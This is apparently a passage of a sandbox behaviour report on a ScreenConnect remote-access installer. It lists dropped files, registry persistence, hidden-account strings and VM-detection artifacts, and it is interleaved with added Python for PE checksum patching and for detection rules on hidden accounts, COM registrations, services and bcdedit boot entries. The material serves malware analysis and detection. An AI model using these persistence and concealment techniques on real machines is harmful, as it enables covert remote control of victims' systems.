                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | Code function: 11_2_00007FF9CC3D22FB push ebx; retf 11_2_00007FF9CC3D22FA
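The "real checksum ... should be ..." entry above is the sandbox comparing the CheckSum field of the optional header with a value it recomputes over the whole file. The Python below is an added example, not code from the report, from Joe Sandbox or from the ScreenConnect product: it implements that computation so the finding can be reproduced against any PE file, and shows the header being patched the way a build step would do it after a deliberate modification. The 256-byte image it builds is a constructed stand-in whose sum can be checked by hand, not the analysed sample. A mismatch is routine for self-extracting installers and for any binary edited after linking, and Windows only enforces the field for kernel-mode drivers and some system DLLs, so on its own it indicates a repackaged or post-build-modified file rather than proving malicious tampering.

```python
import struct


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: 64 bytes into the
    optional header for both PE32 and PE32+ images."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # 4-byte signature + 20-byte IMAGE_FILE_HEADER + CheckSum offset inside the optional header
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data: bytes) -> int:
    """Recompute the header checksum the way imagehlp's CheckSumMappedFile does:
    sum every 32-bit word with end-around carry, skipping the CheckSum word
    itself, fold the result to 16 bits, then add the file length."""
    skip = checksum_field_offset(data) & ~3
    whole = len(data) - len(data) % 4
    total = 0
    for off in range(0, whole, 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", data, off)[0]
        if total > 0xFFFFFFFF:          # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    if len(data) % 4:                   # trailing bytes count as a zero-padded word
        total += int.from_bytes(data[whole:], "little")
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify(data: bytes) -> tuple:
    """Return (stored, computed, ok). A stored value of 0 means the linker never
    filled the field in, which is common and not a finding by itself."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    return stored, computed, stored == computed


def patch_checksum(data: bytes) -> bytes:
    """Write the correct value into the header, as a build step does after
    the file content has changed."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), pe_checksum(data))
    return bytes(buf)


def build_minimal_image() -> bytes:
    """Constructed 256-byte stand-in for a PE file (assumption, not the sample from
    the report): an MZ stub with e_lfanew, a PE signature and zeroed headers, so the
    expected sum is hand-checkable: 0x5A4D ('MZ') + 0x40 (e_lfanew) + 0x4550 ('PE')
    = 0x9FDD, plus the length 0x100 = 0xA0DD. It is not loadable."""
    buf = bytearray(256)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_image()
    stored, computed, ok = verify(data)
    print(f"stored 0x{stored:x} computed 0x{computed:x} -> {'OK' if ok else 'MISMATCH'}")
```

Run it with a file path to check a real binary; with no argument it checks the constructed image, which reports MISMATCH until patch_checksum is applied because its CheckSum field is still zero. Because the field is excluded from the sum, writing the computed value back does not change the computed value, which is what makes the patch idempotent.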

                                  Persistence and Installation Behavior

                                   Source: c:\program files (x86)\screenconnect client (a9232c38f7080cfd)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-abc2-b94479dc0550}\inprocserver32
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll
                                   Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI837B.tmp (listed twice)
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exe
                                   Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8195.tmp (listed twice)
                                   Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll
                                   Source: ScreenConnect.ClientService.dll.3.dr | Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                   Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a9232c38f7080cfd)

                                  Hooking and other Techniques for Hiding and Protection

                                   Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: rundll32.exe, 00000005.00000003.1074517590.0000000004E5A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                   Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                   Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1172386880.000000001C282000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                   Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                   Source: Support.ClientSetup.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: ScreenConnect.Windows.dll.5.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: ScreenConnect.Windows.dll.3.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                   Source: ScreenConnect.ClientService.dll.3.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
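The persistence entries above (the InprocServer32 registration of the credential-provider DLL under its CLSID, the service key for "ScreenConnect Client (a9232c38f7080cfd)", the bcdedit /copy string in ScreenConnect.ClientService.dll) and the SpecialAccounts\UserList path in the strings just listed are the host artifacts a detection engineer would turn into rules. The Python below is an added example, not code from the report or from the ScreenConnect product: it evaluates a handful of constructed records laid out like Sysmon EventID 13 (registry value set) and EventID 1 (process create) against four rules, one per artifact. The event layout, the user names "support" and "helpdesk", the service ImagePath data and the benign shell32 entry are assumptions; only the CLSID, the install directory, the service name and the bcdedit command text come from the report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Registry paths, in Sysmon TargetObject form, behind the artifacts in the report.
HIDDEN_USER_RE = re.compile(
    r"\\Winlogon\\SpecialAccounts\\UserList\\(?P<user>[^\\]+)$", re.IGNORECASE)
INPROC_RE = re.compile(
    r"\\Classes\\CLSID\\(?P<clsid>\{[0-9a-f-]{36}\})\\InprocServer32\\\(Default\)$",
    re.IGNORECASE)
SERVICE_IMAGE_RE = re.compile(
    r"\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\(?P<svc>[^\\]+)\\ImagePath$",
    re.IGNORECASE)
# bcdedit /copy {current} is how a second boot entry such as the
# "Reboot and Reconnect Safe Mode" one named in the DLL string gets created.
BCDEDIT_RE = re.compile(r"\bbcdedit(?:\.exe)?\b.*\s/(?:copy|set)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    image: str


def _is_zero_dword(details: str) -> bool:
    """Sysmon renders REG_DWORD data as 'DWORD (0x00000000)'; 0 hides the account."""
    m = re.fullmatch(r"DWORD \(0x([0-9A-Fa-f]{8})\)", details.strip())
    return m is not None and int(m.group(1), 16) == 0


def _under_windows_dir(path: str) -> bool:
    p = path.strip().strip('"').lower()
    return p.startswith(("c:\\windows\\", "%systemroot%\\"))


def evaluate(event: dict) -> list[Finding]:
    """Apply the four rules to one event and return any findings."""
    out: list[Finding] = []
    image = event.get("Image", "")
    if event.get("EventID") == 13:                      # registry value set
        target = event.get("TargetObject", "")
        details = event.get("Details", "")
        m = HIDDEN_USER_RE.search(target)
        if m and _is_zero_dword(details):
            out.append(Finding("hidden_local_account", m["user"], image))
        m = INPROC_RE.search(target)
        if m and not _under_windows_dir(details):       # in-box COM servers live under C:\Windows
            out.append(Finding("com_inprocserver32_outside_windows", f"{m['clsid']} -> {details}", image))
        m = SERVICE_IMAGE_RE.search(target)
        if m:
            out.append(Finding("service_installed", f"{m['svc']} -> {details}", image))
    elif event.get("EventID") == 1:                     # process creation
        cmd = event.get("CommandLine", "")
        if BCDEDIT_RE.search(cmd):
            out.append(Finding("bcd_boot_entry_changed", cmd, image))
    return out


def triage(events) -> list[Finding]:
    return [f for e in events for f in evaluate(e)]


SC_DIR = r"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)"
# Constructed records (assumptions, not telemetry from the sandbox run).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{6ff59a85-bc37-4cd4-abc2-b94479dc0550}\InprocServer32\(Default)",
     "Details": SC_DIR + r"\ScreenConnect.WindowsCredentialProvider.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ScreenConnect Client (a9232c38f7080cfd)\ImagePath",
     "Details": '"' + SC_DIR + r'\ScreenConnect.ClientService.exe"'},
    {"EventID": 13, "Image": SC_DIR + r"\ScreenConnect.WindowsClient.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\support",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\helpdesk",
     "Details": "DWORD (0x00000001)"},                  # 1 = shown on the logon screen, not a finding
    {"EventID": 1, "Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": 'bcdedit.exe /copy {current} /d "Reboot and Reconnect Safe Mode"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32\(Default)",
     "Details": r"C:\Windows\System32\shell32.dll"},    # in-box location, not flagged
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:36} {f.image}  {f.detail}")
```

All four behaviours are features of the product, so a legitimately deployed support client fires the COM and service rules and can fire the bcdedit rule too; the output is a review queue, not a verdict. What separates abuse of the tool from an ordinary rollout is who launched the installer, whether the server it connects to is one the organisation operates, and whether a hidden account or a new boot entry appeared alongside it, which is why the hidden-account rule keys on the DWORD value and not merely on the key path.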
                                   Source: C:\Users\user\Desktop\Support.ClientSetup.exe | Process information set: NOOPENFILEERRORBOX (30 identical entries)
                                   Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
                                   Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (32 identical entries)
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe    Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\svchost.exe    Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exe    Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 1C10000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 3780000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 1C80000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 6E10000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 64F0000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 7E10000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 8E10000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: 9090000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe    Memory allocated: A090000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe    Memory allocated: 1FE0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe    Memory allocated: 21B0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe    Memory allocated: 2100000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe    Memory allocated: E80000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe    Memory allocated: 1AD30000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe    Memory allocated: 1980000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe    Memory allocated: 1B460000 memory reserve | memory write watch
                                  Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI837B.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8195.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeAPI coverage: 1.6 %
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exe TID: 6948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe TID: 6452Thread sleep count: 46 > 30Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe TID: 6648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 4192Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: svchost.exe, 0000000F.00000002.2315217035.000001FE46452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE46480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 0000000F.00000002.2315217035.000001FE46452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                  Source: svchost.exe, 0000000C.00000002.2317484244.000002796D82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2325000268.0000027972E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: svchost.exe, 0000000F.00000002.2312815530.000001FE46402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                                  Source: svchost.exe, 0000000F.00000002.2316303827.000001FE4646F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
